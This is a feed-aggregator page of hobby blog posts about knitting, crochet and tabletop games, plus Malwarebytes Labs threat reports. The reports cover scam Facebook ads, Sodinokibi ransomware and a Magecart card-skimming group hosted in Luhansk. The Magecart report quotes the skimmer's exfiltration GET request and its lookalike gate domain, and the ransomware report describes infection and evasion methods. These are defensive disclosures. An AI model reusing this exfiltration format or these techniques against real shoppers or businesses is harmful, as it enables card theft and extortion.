Feed aggregator

Briefly in a Lake

Yarn Harlot - Fri, 07/19/2019 - 18:46

I am trudging along here – still looking forward (rather desperately) to the day (28 days) from now when the Bike Rally is finished and things shift around here.  I am not even sure what I will do that day, though I’ve reached a phase of hopefulness where I start piling knitting projects up around the house so I can look at them as I walk by. I can only imagine that August 17th is a day that the Wild Knitting Rumpus will begin, assuming I am conscious.  Between now and then I’m trying to get all this done without completely compromising my sanity, family or what’s left of my relationships. (I have given up on the house, but have adopted AlisonH’s tip for floor cleaning from the comments on the last post, so things are better there.)  Last week some friends invited us up to their cottage, and my love for the Canadian wilds being what it is, I managed to find a way to get myself up there on short notice for three glorious days.  (Joe,  Megan and Elliot managed to stay up there longer, but I jumped on the train bright and early on Thursday for a series of Bike Rally Meetings that couldn’t be missed. You can only imagine the bitterness I felt leaving that kid behind in one of my favourite places.)

We spent the few days I was able to be there swimming,  trying to convince Elliot to  go in the lake (he was fine by the end, but resistance was initially high) and l tried to write to you, but I had to use nap time for Rally Business, and usually if he’s awake and we’re together, Elliot says “Gammy?” every 12 seconds, and I am helpless not to answer him.  I wanted to write and say that despite the state of my life (and improved status of the kitchen floor) I did finish my June Socks, and I had a good enough time knitting them that I’d happily start the pair over.

Pattern is Paragon Socks, Yarn is West Yorkshire Spinners Signature 4 ply in Cardamom.

They look fussier than they are to knit, which is something I like a lot in a pair of socks, and the pattern itself was memorizable – though not until the last repeat of the second sock, in my case, but if your head isn’t full of Bike Rally you might have more room for storing that.)

I’d tell you I loved the yarn too- but that should be obvious by now, since I think it’s turned up on the blog about three times in the last year or so.  Great stuff.

I’ve got the next pair of socks on the needles, but they’re just plain self-striping, because I see how things are this month and wanted to make it a little easier on myself.  (I can see now that this would have been a good month to investigate the perplexing world of hand knit ankle socks, but it’s too late now.) I finished the mini-pom-pom neck thing too, so I’ll get some pictures of that, and look! While I was walking around another pair of socks fell off the needles.

Yarn is Cozy Knitter’s “Celebrate the Night” (I think. I’ve misplaced the ball band again, which isn’t surprising since I can’t even remember when I started these, never mind anything else about them.)

Absolutely no pattern whatsoever, I just banged them out. Top down,  round and round, 2.25mm needles, 68 stitches, German short row heels over half the stitches, and my standard toe. (My standard toe probably isn’t yours because I’m opposed to the pointiness, we can talk about it another time.)

Into the long range planning box for them- it’s actually not looking too shabby in there, I remember the last time I did the Self-imposed-sock-of-the-month-club it was an easy Christmas, I was so far ahead. It’s a lovely thing to think about, since I’m so far behind on everything else right now.

Speaking of behind -let’s get some Karmic Balancing gifts done, because you all are amazing.  Team Knit is still inching towards their goals, and it’s you all we have to thank for it.  I  hope we’re going to make it. If you’re wondering what’s going on here read this:  and Team Knit this year is Me, Ken, Cameron and Pato. Please help us spread the word.

First, a wonderful gift from Tanja Luescher, she’s a designer who’s always one of the first in my inbox with an offer to help. We’ve never met, but I think she’s pretty great.)

Tanja is offering 10 ebooks (20 really, but we’ll do another 10 anther time) Kathryn, Sonja, Rita, Karen, Janis, Sarah, Susanna, Cara, Jessica, and Kelly can all choose between Stories of Inspiration, Selfstriping, Hubby needs Socks, The Cat Collection OR you these lucky knitters can create their own ebook of any 7 patterns.  Thanks all. (And I am going to buy the socks one. I think I found the perfect pair.)

Michele wrote and said that she has three gorgeous gifts that need new homes – thanks Michele! Violets by Mary Scott Huff – the entire kit. (Michele loves this a lot, but is a realist about it’s future with her. I hope that Barbara M loves it and has time. 1 skein (1000 yards) of Tanis Fiber Arts pink label lace weight – variegated graphite is the colourway. Michele found out she’s not a fan of laceweight – so off it goes to Tamara G. 2 skeins (420 yards each) of Tanis Fiber Arts red label cashmere/silk twist – mauve blossoms. (Michele didn’t say why these need rehoming, so I assume it’s straight-up crazy generosity.)  Good news Sarah H, these are winging your way!

Mary E Rose is another designer, and Mary’s written to say that she’d like to give away a free pattern to TEN knitters.  I spent some time with her portfolio, and Smocked Leaves and The White Queen’s Shawl are two I’m putting in my queue.

Good luck choosing to  Lesley E, Brooke S, Wendy N, Dari T, Amanda G, Christine E, Nancy S, Kathy F, Sam M, and Cathy W. There’s a lot of amazing patterns there.

Christina has these three beautiful skeins of Titus (in Coal) to give away.  (What a neat yarn, 50% Wensleydale, 20% BFL, and 30% alpaca – most of that from the UK.)

Those three beauties will be making their way to Lisa H. Lisa and Christina, thank you!

Terry’s got two skeins of Knitpicks Hawthorne Fingering in Burnside that she’d rather inexplicably like to give up. (Must be just that she’s nice.)

That’s more than 600m of amazing that will be making it’s way to Julie A.

But wait there’s more! Brooke’s got two skeins of Three Irish Girls Yarn ‘Adore’ sock yarn, in the ‘Everlasting Gobstopper’ colourway, making it’s way from her house to Josephine P’s. I hope it makes her happy.

Still on the sock yarn train, Linda H has two ever so pretty ones – Sweet Skein o-Mine, in the colourway St. Andrew’s Summer – headed to Cathy A. Thanks both!

That’s it for today, a whole whack of gifts done, and I’ve emailed the 27 lucky winners, and the generosity in my inbox overfloweth.  There’s much more to come.  For now, I’m off to look over about 7 spreadsheets that contain more details about a small moving city of cyclists than anyone could ever hope to memorize, and hope to drill enough parts of it into my head to get this thing off the ground. Oh. I also have to figure out the cutlery.  Who knew?

Categories: Knitting Feeds

Thralls of the Faceless Lord - Some Thoughts On The Lowly Gelatinous Cube & Its Kin

Swords & Stitchery - Fri, 07/19/2019 - 17:50
The other day I was reading through the Advanced Dungeons & Dragons 1st edition  Monster Manual & came upon the gelatinous cube entry. Every single dungeon that I've played in has had a gelatinous cube or some variety of that monster  within it. Why?!Every dungeon or wizard's tower seems to have one to clean up the remains of adventurers. They are hyper efficient at what they do. They Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

[MODULE] The Nocturnal Table (NOW AVAILABLE!)

Beyond Fomalhaut - Fri, 07/19/2019 - 16:28
The Nocturnal Table
I am happy to announce the publication of The Nocturnal Table, a 60-page game aid dedicated to city-based adventures, lavishly illustrated by Matthew Ray (cover), Peter Mullen, Stefan Poag and Denis McCarthy. Originally conceived in 2010 as an article for Knockspell Magazine (but only published in the Hungarian), the supplement has since gone through a lot of active play over multiple campaigns, and been expanded with additional material to offer a handy guide to design and run adventure scenarios in a large, sinful city filled with action and intrigue. This is a game aid designed for regular table use, and formatted to be comfortable and accessible. Whether your pick is Lankhmar, the City State, the City of Vultures or Imperial Rome, this supplement will help generate much of the texture of the streets – from illicit warehouses to the monsters and madmen who prowl the night! Citing the back cover…
“The City is a maze. A labyrinth of alleyways, plazas, shortcuts and hidden thoroughfares, it isn’t any less treacherous to navigate than a dungeon. At least during the day, the worst one can expect is a greedy patrol of guards eager for a shakedown, or a thief in the crowd, ready to make a grab and run for it. At night, the sensible and the timid hurry home and bolt their doors. Ecstatic revellers, madmen, assassins, religious fanatics, thrill-seekers, enigmatic apparitions and tiger-headed opium nightmares prowl the streets. And the guards are still not helping. 
The Nocturnal Table is a supplement intended to bring you this city by way of an encounter system, random inspiration tables, NPC and monster statistics, as well as a giant nighttime random encounter table, whose three hundred entries can serve as interludes as well as springboards for complicated investigative scenarios and fantastic conspiracies.”
At the core of The Nocturnal Table is a 300-entry table of random encounters and odd events you can run into at night in a busy fantasy metropolis. From a patrol of guards carrying a slain comrade, to a sinister beggar-catcher soliciting the aid of dishonest adventurers, or a skeleton covered in grey ooze, its eyes glittering gemstones shambling towards the party, all the wonder and menace of a city-crawl are at hand. But that is not all. With The Nocturnal Table, you can…
  • …create general encounters with the aid of a comprehensive encounter system. A caravan in Hightown threatening the party? Six jackalweres offering secret information near the port at night? Or a magic-user accusing a PC in the bazaars? That could be the beginning of a story (or the end of one).
  • …generate merchants selling strange and fantastic goods (as seen in Echoes From Fomalhaut #01 – that table would have been a crime not to reprint here). Is that jovial guard selling weapons as a form of bait? Are that credible horseman’s sugared fruits really from a foreign dimension?
  • …find out what’s in their pockets. The guard came up with a pouch of 12 gold and a folded hood, but that horseman? His 50 silver, 5 electrum and 10 gp was also accompanied by a weird diagram.
  • …generate local colour on the fly. Ominous, gurgling pipes overhead? A drunk who insists he has just seen a party member go the same way “just a while ago”?
  • stock warehouses with exotic goods to plunder! Leave those odd, primitive swords and the rustic carpets collecting dust in the corner, and find out how much those ceremonial globes may be worth.
  • …and set up secret meetings and investigation sites. The meeting will place behind the old, crumbling mosaic – but don’t touch the drink. And the trail leads on, by the sign near the mortuary… just take care: the children are spies!
Guidelines are also offered to re-use the encounters and chart contents for the construction of bizarre plotlines and sinister conspiracies which rule from the shadows… while the City sleeps (these guidelines have been previewedon this blog). All that, and more are at your disposal in… The Nocturnal Table!
The print version of the supplement is available from my Bigcartel store; the PDF edition will be published through DriveThruRPG with a few months’ delay. As always, customers who buy the print edition will receive the PDF version free of charge.
Do note that a flat shipping fee is in effect: you will pay the same whether you order one, two, or more items (larger orders may be split into multiple packages and shipped individually – this does not affect the shipping fee).
Categories: Tabletop Gaming Blogs

Classic D&D, Weapons.

Bat in the Attic - Fri, 07/19/2019 - 16:03
My friend Chris over on Clash of Spear on Shield talks about Sling damage versus Large creature. Particularly how sling damage increases versus large damage and how he finds issues with that idea.

Which leads to a wider question of the consequences of the different options for modelling weapons, injury, and armor class in various editions of classic DnD.

Recap
In Chainmail man to man combat the odds of an opponent be killed was found on a chart cross indexing weapon versus a specific type of armor. You roll that number or higher on 2d6 and the target was killed.

This element was not in the original release of the 3 LBB (Little Brown Books) but worked it way in with the release of Greyhawk. There it was presented as a weapon versus AC chart. Using the chart would result in a modifier (or not) to your to-hit roll if you were using that weapon versus that armor.

The chart is derived from the man to man chart in Chainmail. Basically that was a 8 or better to hit was a +0 modifer and the rest were calculated from there. Although Gygax tweaked the number as it doesn't quite line up with the man-to-man chart.

Greyhawk also saw the introduction of variable weapon damage where each weapon used a different dice and/or modifier. Along with a different set of damage for large creatures.

Finally in ADnD we see weapon length, weapon space requirement, and weapon speed factors. Weapon length explicitly defined how far an opponent can be attacked, and weapon space defines how small of a space a weapon can be used effectively. Weapon Speed factors only came into play if initiative was tied and could result in multiple attack for the wielder of the weapon.

The State of the Mechanics
Not all of these mechanics found their way into people's campaigns. Either back then or today. Of these varying weapon damage is the one that is most commonly used. A different set of damage versus large creatures is not found as often. Weapon Length is sometimes a factor especially if the weapon is clearly a polearm meant to be used in the 2nd rank or further back. Weapon space requirements is also run on an ad-hoc basis.

Weapon versus AC may be a little less popular than Weapon Speed Factor but not by much. Both are are generally not used. Weapon vs AC involves yet another chart lookup, and Weapon Speed Factor was part of a initiative system so poorly understood that there are two separate interpretations and  multiple page documents to attempt to explain them.

My Take
So when it comes to my Majestic Fantasy Rules, my reasoning was a follows. The core of combat is the to hit roll versus Armor Class. It bundles actual contact with overcoming the armor into a single roll and an essential part of how classic editions work.

I think varying weapon damage is the way to go. Injury is caused by force. Force is determined by mass time acceleration. Different weapons have different masses and are designed differently to channel that mass into force. So varying the damage dice for different weapon is a good way to model this without getting overly complex.

Because damage is a result of force, which equal mass time acceleration, it doesn't make sense to me to vary damage for large creature. Instead a more straight forward method to give them more hit point or hit dice to represent their increased mass. Luckily classic DnD is consistent with this with the various giant versions of creatures so I don't have to do any work in this regard.

As for weapon speed I prefer individual initiative where everybody rolls 1d6 plus bonuses. High roll has the option of acting first. The classic weapon speed mechanic has little relevance for me as it tied tightly to the ADnD initiative system.

While I think that Weapons versus AC is one chart too many, I think the concept is sound. Different weapons are designed differently and some are more effective than other against certain types of armor. Despite the abstract nature of classic edition combat, it at level that I think a light touch would be add something to combat.

 I opted to handle this by noting any special bonuses in the description of the weapon. For example maces gets +1 to hit versus opponents wearing chainmail or gelatinous creatures like ochre jellies or black puddings.

This method allowed to add other interesting attributes to weapons with a similar light touch. For example an axe can be used to pin a weapon if the opponent fails their saving throw. Something I learned from reading how axe were used throughout history. Typically this is followed up by a blow from the shield or a takedown after grappling with the opponent.

You can read my take with the either of the following two free downloads.

The Majestic Fantasy Basic Rules
The Majestic Fantasy Equipment Rules
Categories: Tabletop Gaming Blogs

Beer Growler Cozy

Moogly - Fri, 07/19/2019 - 15:05

The Beer Growler Cozy makes a great gift for beer lovers, summer or winter – you might just have to make a few of this free crochet pattern on Moogly! Disclaimer: This post includes affiliate links; materials provided by Red Heart and Clover USA. What is a Beer Growler? A growler is (usually) a glass...

Read More

The post Beer Growler Cozy appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

2
Categories: Crochet Life

New Facebook ad reporting tool launches in UK

Malwarebytes - Fri, 07/19/2019 - 15:00

Last year, well-known consumer advice expert Martin Lewis decided to take Facebook to court for defamation. The cause? Multiple bogus adverts placed on the social network featuring his likeness, appearing via the ad network Outbrain.

As a trusted face in consumer causes, scammers bolting Lewis’ face onto rogue ads would always be a money spinner. This would, of course, have the knock-on effect of potentially damaging his reputation, especially with tales of victims losing as much as £100,000

By the time he’d seen around 50 advertisements promoting various Bitcoin scams, enough was enough—especially as he felt reporting the ads got him nowhere.

Making bogus ads for fun and profit

Regular readers will no doubt be familiar with these types of bogus ads hawking swiped images of trusted individuals. It’s essentially the same as we saw a while back on compromised profile pages, all promoting some wonderful new money-making scheme courtesy of Ellen. However you stack it up, people are out of pocket.

In Lewis’ case, some of the ads looked like they were from British newspapers, or other established news sources. Many offered up the usual social engineering tactic of a ticking timer: “Get this offer soon before it runs out!” Work-from-home riches, revolutionary opportunities, making huge amounts from “small” investments—every sleazy claim you could imagine were all present and accounted for, and they all were situated next to or above Lewis looking enthusiastic (and talking about something utterly unrelated).

Facebook banned crypto-themed ads, but these Lewis-themed efforts simply replaced pictures of Bitcoin with pictures of him and sent them to cryptocurrency sites elsewhere. The Lewis ads in question were centered on incredibly dubious binary trading scams.

What is binary trading?

It’s a risky form of fixed-odds betting. You either win or you lose. Win, and you get a bump in your coffers. Lose, and you lose everything. They’re not allowed in the EU, which means scammers set up shop outside its borders, claiming to have base of operations in places like London and Paris, and set to work with slick, convincing adverts. As the FCA advice notes, some scammers will even manipulate the numbers in front of potential victims before swiping all the cash and vanishing into the night.

So it is into this maelstrom of potentially damaged reputations, bogus adverts, and incredibly devastating fake Bitcoin scams that Lewis and Facebook went into battle. With what he felt was a lack of responsiveness over the course of a year, off he went to try and get something done about it.

Closing time for bad ads?

In January 2019, Lewis agreed to settle out of court. By this point, Facebook had admitted there’d been “thousands” of these ads across the site. The legal settlement relied on the conditions that Facebook would donate £3 million pounds to Citizen’s Advice to create a UK Scams Action Project, and they’d also launch a UK-centric scam ad reporting tool complete with dedicated team. The donation would take the form of £2.5 million in cash over two years, with the other £500,000 covering Facebook ads presumably promoting the new services.

https://youtu.be/xxv0izTxrjg

We have lift-off

A little later than previously advertised, the wheels have finally turned and the promises listed above have turned into tangible reality. Not only is the Scams Action page live, the rogue ad report tool is also active in the UK. Reporting an ad takes a few steps, but is clearly an improvement on no tool at all. Reporting is a case of clicking the dots above any ad, and selecting the appropriate options before sending.

Click to enlarge

Click to enlarge

There’s never been a better time to start reporting bogus ads on Facebook. If you see something that looks suspicious, by all means file a report and do your bit to help keep the most vulnerable online away from potentially life-ruining scams.

The post New Facebook ad reporting tool launches in UK appeared first on Malwarebytes Labs.

Categories: Techie Feeds

3 Things to Expect as a Beginner in Aikido

Aikido Blogs - Fri, 07/19/2019 - 14:37
Just finished uploading my latest vlog to YouTube. It's about the 3 things you can expect as a beginner in Aikido.

Click Here and Please take a look, comment, share and subscribe to my channel!


Categories: Aikido

Save or Die! Podcast #154

Zenopus Archives - Fri, 07/19/2019 - 13:43


I recently had the pleasure of returning as a guest on the podcast Save or Die!, this time with DMs Carl, Courtney and Chrispy, and it is now available for listening:
Save or Die! Adventure 154 - Holmes Basic
"The three hosts are together again in the latest Save Or Die! where we talk Holmes Basic with our guest the Arch Zenopus himself Zach of the Zenopus Archives. A SOD favorite gets reexplored as we take a deep dive into what makes Holmes Basic such an endearing part of D&D history."Also, don't miss the Actual Play of the dungeon run by Carl, the first part of which is at the end of the episode (I'm not part of this).

Links for Further Reading on Topics Discussed on the Show:

The Warlock D&D Rules

Holmes Manuscript Part 3: "Elves Muse Decide"

Holmes Manuscript Part 16, covering attacks per round in combat

Holmes Manuscript Part 10, section on Magic Missile

Holmes Manuscript Part 17, section on The Parry

Article on origins of the Ochre Jelly and Blob

Summary of Tolkien References in the Blue Book

Holmes Manuscript Part 19: "If One Wanted to Use a Red Dragon..."

Holmes Manuscript Part 46: "Zenopus Built a Tower": intro to the Sample Dungeon

Zenopus Dungeon Factions, including the Thaumaturgist

Article in a New Cthulhu Zine, Bayt Al Azif issue #1

The Tower of Zenopus in Ghosts of Saltmarsh


Earlier Save or Die episodes that may be of interest:

Side Adventure 20: NTRPGCon Wrap Up 6/14/19 --- at 17:30 Carl talks about how I guested as his version of Zenopus in his Sat night Discos & Dragons game

Side Adventure 16: Favorite Boxed Set 1/7/19 --- at 8:50 Carl talks about Holmes Basic and mentions this site

Side Adventure 14: House Rules! with guest Chris Holmes 10/6/18

Episode 124: Save vs. Zenopus 7/17/16 --- my previous occasion as guest

Adventure 136: Michael Thomas on Journeymanne Rules 5/16/17

Side Adventure 12: J. Eric Holmes Seminar NTRPGCon 8/14/16 --- Audio recording of a  panel with Chris Holmes, Allan Grohe & myself 

Episode 122: Save vs. Chris Holmes 5/11/16

Episode 117: Save vs. Blueholme 11/16/15 --- guest Michael Thomas

Categories: Tabletop Gaming Blogs

Link Love: My Favourite Things Things Week

Knitted Bliss - Fri, 07/19/2019 - 11:00

www.knittedbliss.com

My Favourite Articles and Links This Week Oh my gosh- did you hear about Finland’s heavy metal knitting championship?! You have to see this. I just heard about an amazing website that helps you figure out all the ways you can get from Point A to Point B– flights, trains, buses, cars. With estimated costs

The post Link Love: My Favourite Things Things Week appeared first on %%www.knittedbliss.com%%.

3
Categories: Knitting Feeds

Omniverse: Incumbents are from Earth, Sivanas are from Venus

Sorcerer's Skull - Fri, 07/19/2019 - 11:00

In September of 1936, all across America aircraft beginning dropping flyers proclaiming a new candidate for the highest office in the land. At the urging of her father, Beautia Sivana was running for President. Thaddeus Bodog Sivana planned to stage a coup once his daughter was in office. Hers was the most massive, multi-media, write-in campaign this country has ever seen. Her beautiful visage graced the covers of magazines and full page newspaper ads. Her captivating voice could be heard on radio addresses. Women were cool to her candidacy, but men were enthralled. Most men. Boy reporter, Billy Batson, wasn’t fooled one bit. His alter ego, Captain Marvel foiled the Sivanas’ plot and returned mad scientist and would-be president to Venus*, where Beautia would have to content herself with being Empress.

Ultimately, Beautia didn’t share her father’s devotion to evil and in fact pursued a career in social work upon her return to Earth, according to some accounts.

*Or what Sivana said was Venus. It is difficult to square the real planet with its depiction in this record.

Shooting fish in an OSR barrel - Some Guidelines In the Table Top Hobby & the OSR

Swords & Stitchery - Fri, 07/19/2019 - 03:14
One of the things that I really miss about the world without the internet was the scale of TSR back in the classic days. If you were lucky enough to find a Dragon magazine at the local street level then it was a gateway to world that someone in small town New England America at eight or nine didn't know anything about. Gary Gygax is someone that I knew only in passing  & having talked with at Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

'Playing With The OSR' Using & Abusing OSR Systems & Adventures For Campaign Use

Swords & Stitchery - Thu, 07/18/2019 - 18:40
Alright so I've been getting a bit of heat about the fact that the last blog post used classic original Dungeons & Dragons & Advanced Dungeons & Dragons books with both Godbound & Stars Without Number.  Many of the main line OSR retroclone systems will work with the Sine Nomine Publishing lines of games. Why?!None of that really matters by comparison to say Godbound or Stars Without Number. Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Malwarebytes - Thu, 07/18/2019 - 17:58

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid June and mid July. Based on our telemetry, Sodinokibi has been on rise since GandCrab’s exit at the end of May.

Business and consumer detection trends for Sodin/REvil from May 2019 until present

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief at GandCrab’s “passing,” some expressed skepticism over whether the team would truly put behind their successful money-making scheme. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

Enter Sodinokibi

Putting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers—”affiliates” in the case of RaaS operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi has been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8 Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en-masse. This is done by accessing networks via a remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding ransom note will have the file name r4nd01-readme.txt.

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in their attacks—but Sodinokibi is not your average ransomware. It takes advantage of an elevated privilege zero-day vulnerability in the Win32k component file in Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruitArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects premium consumer users and business users with signature-less detection, nipping the attack in the bud before the infection chain even begins. Users of our free version are not protected from this threat without real-time protection.

We recommend consumers take the following actions if they are not premium Malwarebytes customers:

  • Create secure backups of your data, either on an external drive or on the cloud. Be sure to detach your external drive from your computer once you’ve saved all your information, as it, too, could be infected if still connected.
  • Run updates on all your systems and software, patching for any vulnerabilities.
  • Be aware of suspicious emails, especially those that contain links or attachments. Read up on how to detect phishing attempts both on your computer and your mobile devices.

To mitigate on the business side, we also recommend IT administrators to do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel or employees who need access only.
  • Disable macro on Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.
Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Malwarebytes - Thu, 07/18/2019 - 15:00

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and trying to pass itself for Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to login into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider. It’s quite likely the threat actors may be taking advantage of it.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

